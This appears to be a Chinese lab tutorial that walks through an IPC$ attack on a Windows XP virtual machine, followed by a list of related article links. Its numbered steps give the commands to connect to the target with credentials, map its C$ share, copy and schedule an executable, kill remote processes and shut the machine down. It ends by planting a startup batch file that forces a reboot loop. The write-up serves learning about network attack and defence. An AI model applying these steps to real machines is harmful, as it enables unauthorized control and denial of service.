网络安全攻防之IPC$攻击
IPC$空会话攻击
我的实验环境是两台虚拟机,分别是windows xp sp3和windows xp sp2 。windows xp sp3作为主机,windows xp sp2作为靶机:
1.首先在靶机端运行cmd,输入命令net share查看当前系统中的硬盘是否处于共享状态,windows xp等在默认情况下都是开启资源共享服务的,同时查看windows xp的IP地址为192.168.44.130
2.文件共享服务对应的端口号分别是139(供NetBios名称使用),445(供IP地址使用),一般IPC$连接也是通过这两个端口的,所以在windows 2000的命令行中输入netstat –an查看当前这两个端口是否处于开启状态,如下图:
3.开始在windows xp端进行IPC$连接,在cmd中输入
net use \\192.168.44.130\ipc$ “(此处为计算机用户的密码)” /user:”(用户名)”,如下图:
可以看到命令成功完成,说明建立IPC空会话成功
4.将windows 2000系统上C盘的内容共享,使用如下命令:
net use z: \\192.168.44.130\c$
输入该命令后,在主机系统上就会出现共享C盘内容的Z盘驱动器,如下图:
5.向远程计算机复制文件,把windows xp系统C盘上的sogou_explorer.exe 复制到靶机的C盘上,并命名为sogou_explorer.exe,过程如下图:
命令如下:copy c:\sogou_explorer.exe z:\sogou_explorer.exe:
可以看到Z盘上出现了sogou_explorer.exe文件:
6.查看靶机的系统时间,命令是 net time \\192.168.44.130:
7.令远程计算机运行指定程序:
用如下命令:at \\192.168.44.130 9:27 c:\sogou_explorer.exe 可以看到新添加了一项作业:
8. 列出远程计算机当前运行的进程,在命令行中输入
tasklist /s 192.168.44.130 /u (远程计算机用户名) /p (密码):
9.终止远程计算机中当前运行的进程:
我选择终止的进程是cmd.exe 进程PID是3596
输入命令:taskkill /s 192.168.44.130 /u (远程计算机用户名) /p (密码):
可以看到PID为3596的cmd.exe进程被终止了:
10. 关闭远程计算机:在命令行中输入命令:
shutdown –s –t 30–m \\192.168.44.130 令远程计算机倒计时30秒后自动关机:
事实上在远程计算机上可以看到它自己被远程用户连接,打开计算机管理,点击共享文件夹中的会话,可以看到当前计算机用户被远程连接了,还有连接时间,打开文件等信息显示:
接下来再做一件事,让对方主机开机后自动重启,首先在主机上编写shutdown.bat文件,文件内容是shutdown –r 将该文件通过上面的copy方式复制到靶机中,将shutdown.bat文件拷贝到启动文件夹中,则当靶机开机时会自动运行该bat文件,过程如下图:
在主机中点开我的电脑中的Z盘,即共享出的靶机的C盘资源,将这个shutdown.bat文件剪切粘贴到Z盘的启动目录 Z:\Documents and Settings\All Users\[开始]菜单\程序\启动,这样靶机在开机后会自动运行这个bat文件,就会出现开机自动重启的情况:
网络安全攻防之IPC$攻击相关推荐
- 网络安全攻防演练的组织架构是什么?有哪些防守手段?
网络安全的本质在对抗,对抗的本质在攻防两端能力较量.不同层级.规模的攻防演习已经成为检验网络安全能力水平的重要手段,同时,也是维护网络空间安全的绸缪之举.高质量的网络攻防演习可以最大化的发现目前网络存 ...
- 《无线网络安全攻防实战》读书笔记
为什么80%的码农都做不了架构师?>>> <无线网络安全攻防实战> 虽然无线破解早就烂大街了,还是去图书馆把这本书补上了,做个笔记,以供以后参考,记得很全面但很乱. ...
- 喜讯 雨笋教育优秀学员荣获望城区网络安全攻防演练二等奖
雨笋君近日收到一份来自望城区网信办对雨笋优秀学员工作肯定的表扬信. 为切实做好2022年全国"两会"期间长沙市望城区网络安全保障工作,检验提升全区关键信息基础设施网络安全防护和应急 ...
- 网络安全攻防演练项目介绍
有很多朋友问我写的攻防演练是什么? 本文给予回答 网络安全攻防演练是公安部组织的面向税务.电力.电信.银行.铁路.财政.广电.水利.教育.互联网.检察院.法院.石油.交通等行业的政府单位/公司,开展的 ...
- 计算机网络攻防演练,网络安全攻防演练
"没有网络安全就没有国家安全",网络安全已经上升到国家安全的层面.网络安全从管理到技术保障都需要专业化的人员和团队.网络空间的竞争,归根结底是人才竞争,要采取开放的政策,聚天下英才 ...
- 网络安全攻防五件套,OCSP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
作为网络安全行业的爱好者/从业者,你还在搜安全教程.看书.加入各种圈子.下载学习资源.观看视频教程吗?兴趣和耐心还能支撑住吗? 搞攻防,重在理论+实践!想要路子正.方法对.见成效,网络安全攻防五件套( ...
- 攻防演练中攻击队攻击的必备能力
蓝队攻击的必备能力 开展网络渗透对蓝队人员的岗位技能和动手能力都有较高的要 求,这些能力要求侧重于攻防实战,是蓝队人员综合能力水平的体 现.因为蓝队人员在实战攻防演练中面对的是十分契合真实网络条件 的 ...
- [CTF/网络安全] 攻防世界 php_rce 解题详析
[CTF/网络安全] 攻防世界 php_rce 解题详析 PHP REC ThinkPHP V5漏洞Payload 姿势 总结 PHP REC PHP RCE 指的是通过远程代码执行漏洞(Remote ...
- 【大咖讲座】网络安全攻防对抗发展与趋势
为切实提高学生网络攻防实战能力,拓展学生对红蓝对抗前沿技术的认识,2023年3月2日9:30-11:00,北京斗象信息科技有限公司的王涛.王晓喆两位专家应网络空间安全与法治协同创新中心的邀请,围绕&q ...
最新文章
- Coolite 中GridView点击行中的按钮时跳转至不同的页面
- 水稻微生物组时间序列分析精讲1-模式图与主坐标轴分析
- Problem executing scripts APT::Update::Post-Invoke-Success ‘if /usr/bin/test -w /var/lib/command-not
- [Linux]守护进程(精灵进程)
- 「雕爷学编程」Arduino动手做(36)——WS2812B 4位彩灯模块
- android五子棋设计模板,基于android的五子棋游戏设计
- 解决IE8不支持数组的indexOf方法
- 初学opengl的一些知识整理-1
- 写了个淡入淡出的jq幻灯片插件
- ModuleNotFoundError: No module named ‘models‘
- 快递单号快速查询,自动识别快递公司
- 谁吃土的时候没有受过委屈?
- ab153x-ut apk 洛达1562a蓝牙检测工具 真)
- 5、CPU Subsystem 01(5.1-5.7)
- 摩伴windows桌面服务器,魔伴windows桌面
- 三线制PT100测正温(篇一)
- Unity零基础到入门 ☀️| 近万字教程 对 Unity 中的 动画系统基础 全面解析+实战演练,你确定要错过吗?
- 一零二一、ERROR StandaloneSchedulerBackend: Application has been killed. Reason: All masters are unrespon
- 硕士研究生论文查重率多少合格?
- 安卓篇.将阿拉伯数字转化成罗马数字
热门文章
- 《node-thunder》:Node使用迅雷下载
- “GitHub: Your account has been flagged.”的完美解决方法
- IDS(Informix Dynamic Server)的基本概念总结
- 【论文阅读】LOKI-Practical Data Poisoning Attack against Next-Item Recommendation
- Cocos Creator 热更新文件MD5计算和需要注意的问题
- 神经网络如何训练数据,神经网络常用训练方法
- 安卓xml文件中设置动画匀速旋转无效?
- Loadrunner11在Win10上使用踩过的坑
- 位置定位LocationManager
- Android实现登录邮箱的自动补全功能